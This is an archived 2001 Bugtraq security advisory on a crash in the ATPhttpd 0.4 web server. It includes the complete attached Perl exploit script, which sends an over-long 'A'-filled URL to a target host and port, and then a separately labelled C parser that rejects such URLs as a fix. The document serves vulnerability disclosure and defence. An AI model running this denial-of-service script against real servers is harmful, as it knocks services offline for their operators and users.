[23497] in bugtraq
ATPhttpd 0.4 DoS Vulnerability
daemon@ATHENA.MIT.EDU (Tamer Sahin)
Thu Dec 13 19:44:53 2001
Message-ID: <00fb01c1841a$ccdb1310$959c2bd5@ts>
Reply-To: "Tamer Sahin" <ts@securityoffice.net>
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 13 Dec 2001 23:11:57 +0200
ATPhttpd 0.4 DoS Vulnerability
Type:
DoS, crashes Daemon
Release Date:
December 13, 2001
Product / Vendor:
ATPhttpd, the tiny, caching, high performance webserver. ATPhttpd is
ideal for serving lots of static content, especially where disk I/O
is expensive, such as NFS mounted web shares, or graphics servers.
http://www.redshift.com/~yramin/atp/atphttpd/
Summary:
The server crashes after a very long URL is sent to it a few times.
http://host/AAAAAAAAA...(Ax3000)...AAA
Log:
You may reach the core file through
http://www.securityoffice.net/downloads/atphttpd.core
Exploit:
atphttpd.pl by Tamer Sahin
http://www.securityoffice.net/downloads/atphttpd.txt
Tested:
OpenBSD 2.9 / ATPhttpd 0.4 Alpha release
Vulnerable:
ATPhttpd 0.4 Alpha release (and possibly others)
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
Attachment: atphttpd.pl
#!/usr/bin/perl -w
#
# ATPhttpd 0.4 DoS Vulnerability
#
# Type:
# DoS, crashes Daemon
#
# Release Date:
# December 13, 2001
#
# Product / Vendor:
# ATPhttpd, the tiny, caching, high performance webserver. ATPhttpd is ideal for serving lots of static content,
# especially where disk I/O is expensive, such as NFS mounted web shares, or graphics servers.
# http://www.redshift.com/~yramin/atp/atphttpd/
#
# Summary:
# Server crashes after sending very long URL a few times.
# http://host/AAAAAAAAA...(Ax3000)...AAA
#
# Log:
# You may reach the core file through
# http://www.securityoffice.net/downloads/atphttpd.core
#
# Exploit:
# atphttpd.pl by Tamer Sahin
# http://www.securityoffice.net/downloads/atphttpd.pl
#
# Tested:
# OpenBSD 2.9 / ATPhttpd 0.4 Alpha release
#
# Vulnerable:
# ATPhttpd 0.4 Alpha release (And may be other)
#
# Disclaimer:
# http://securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.
#
# Author:
# Tamer Sahin
# ts@securityoffice.net
# http://www.securityoffice.net
die "ATPhttpd 0.4 DoS Vulnerability / Usage: $0 host port\n" if $#ARGV <1;
print "DONE!\n\n";
print &GetHTTP($ARGV[0],$ARGV[1]);
exit 0;
sub GetHTTP {
use Socket;
my($remote,$doc) = @_;
my ($port, $iaddr, $paddr, $proto, $line,@output);
$port = $ARGV[1];
$sockaddr = 'S n a4 x8';
$doc = "A" x 3000;
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
die "No port" unless $port;
$thisaddr = gethostbyname("localhost");
$thataddr = gethostbyname($remote);
$this = pack($sockaddr, AF_INET, 0, $thisaddr);
$that = pack($sockaddr, AF_INET, $port, $thataddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";
bind(SOCK, $this) || die "bind: $!";
connect(SOCK, $that) || die "connect: $!";
select(SOCK); $| = 1; select(STDOUT);
print SOCK "GET $doc HTTP/1.0\n\n";
do {
$line = <SOCK>
} until ($line =~ /^\r\n/);
@output = <SOCK>;
close (SOCK) || die "close: $!";
@output;
}
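An added example, not part of the original advisory and not ATPhttpd's code: a request-line parser in C that checks the length of the request target before copying it and answers 414 for an over-long URL like the one in the Summary. The advisory does not state the root cause of the crash; the 1024-byte limit, the function names and the sample requests are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_URI_LEN 1024  /* assumed limit for this example, not an ATPhttpd setting */

/* Parse "METHOD SP request-target SP version LF" from a received buffer.
 * The target is copied into uri_out only after its length has been checked.
 * Returns the HTTP status to act on: 200 (accept), 400 or 414. */
int parse_request_line(const char *buf, size_t len, char *uri_out, size_t uri_cap)
{
    const char *end = memchr(buf, '\n', len);
    if (end == NULL)                      /* no line terminator in the buffer */
        return len > MAX_URI_LEN ? 414 : 400;
    if (end > buf && end[-1] == '\r')     /* accept CRLF as well as bare LF */
        end--;
    const char *sp1 = memchr(buf, ' ', (size_t)(end - buf));
    if (sp1 == NULL || sp1 == buf)
        return 400;                       /* no method */
    const char *uri = sp1 + 1;
    const char *sp2 = memchr(uri, ' ', (size_t)(end - uri));
    if (sp2 == NULL || sp2 == uri)
        return 400;                       /* no target or no version */
    size_t uri_len = (size_t)(sp2 - uri);
    if (uri_len > MAX_URI_LEN || uri_len >= uri_cap)
        return 414;                       /* URI Too Long: reject, never truncate */
    memcpy(uri_out, uri, uri_len);
    uri_out[uri_len] = '\0';
    return 200;
}

/* Constructed sample: "GET /AAA...(n times) HTTP/1.0", the request shape
 * the advisory describes. Returns the status the parser assigns to it. */
int status_for_path_len(size_t n)
{
    static char req[8192], uri[MAX_URI_LEN + 1];
    if (n + 16 > sizeof req)
        return -1;
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', n);
    memcpy(req + 5 + n, " HTTP/1.0\n\n", 11);
    return parse_request_line(req, 5 + n + 11, uri, sizeof uri);
}

int main(void)
{
    printf("3000-byte path: %d\n", status_for_path_len(3000));
    printf("1023-byte path: %d\n", status_for_path_len(1023));
    return 0;
}
```

A server using such a check would send the 414 response and close the connection without passing the target to any later path or cache lookup.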